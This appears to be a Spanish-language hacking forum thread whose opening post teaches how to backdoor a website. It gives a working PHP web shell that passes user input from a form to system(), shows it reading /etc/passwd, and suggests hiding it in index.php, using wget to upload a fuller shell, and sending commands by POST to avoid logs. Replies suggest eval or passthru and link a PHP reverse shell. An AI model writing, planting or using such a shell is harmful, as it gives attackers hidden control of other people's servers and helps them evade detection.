Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);
echo $lol;
}
?>
En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:
(http://i.imgur.com/9cPL1.png)
Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.
En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.
Otra cosa que podemos hacer es poner
$lol = @system($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd
y ejecutaria lo que es el comando.
Agradecimientos: Oggy & HD_Breaker
Espero que les haya gustado.
Un saludo.
Esta bien el script sencillo,pero util aunque yo usaria la función passthru enmes de system sobretodo para linux ademas lo suelta en bruto.
Saludos
Bien hecho Okol! Linda shell! Yo usar POST, para q no quede guardado en los log al visitar la shell ;)
Buena esa man 8)
En vez de system, debieras reemplazarlo con eval(). Razón?? Simplemente porque system te permite ejecutar comando del sistema, en cambio eval te permite ejecutar un código PHP.
eval() (http://www.php.net/manual/en/function.eval.php)
Saludos.
Esta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
está genial la explicación, éste minituto para los que recién empezamos :D
CitarEsta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-
saludos!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
está genial la explicación, éste minituto para los que recién empezamos :D
CitarEsta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-
saludos!
Muchas gracias por tu aclaración a ese usuario alex.
No estoy diciendo cual es la mejor forma, simplemente explique una.
Saludos.
El hecho de utilizar tus propias herramientas te hace resaltar del resto, no es reinventar la rueda, es independizarse, esto te convertira en mejor hacker y mejor programador, y ser menos lammer y vivir de herramientas que otros crearon.
Ok, no es mi intención restar importancia a este aporte, ni tampoco desvalorizar el esfuerzo del usuario que ha creado este post (no soy quien para hacerlo) sin embargo, me pregunto, donde esta la backdoor? donde esta la vulnerabilidad que se ha explotado para crearla? es una RFI/LFI? es una vulnerabilidad del servidor o de una aplicación web concreta? lo que quiero decir, es que el aporte se resume en esto:
@system('comando');
Y ojo, que no se trata de una critica ni estoy cuestionando a nadie, no es para que os pongáis a la defensiva ;) solamente digo que tras leer el titulo del post, esperaba mucho más (como la explotación de una vulnerabilidad para crear una mini-backdoor), pero bueno, estoy seguro que a una persona que comienza a aprender a programar en PHP le será muy útil.
Saludos. :)
Fin de ronda.
No más llevense bien , cierro tema.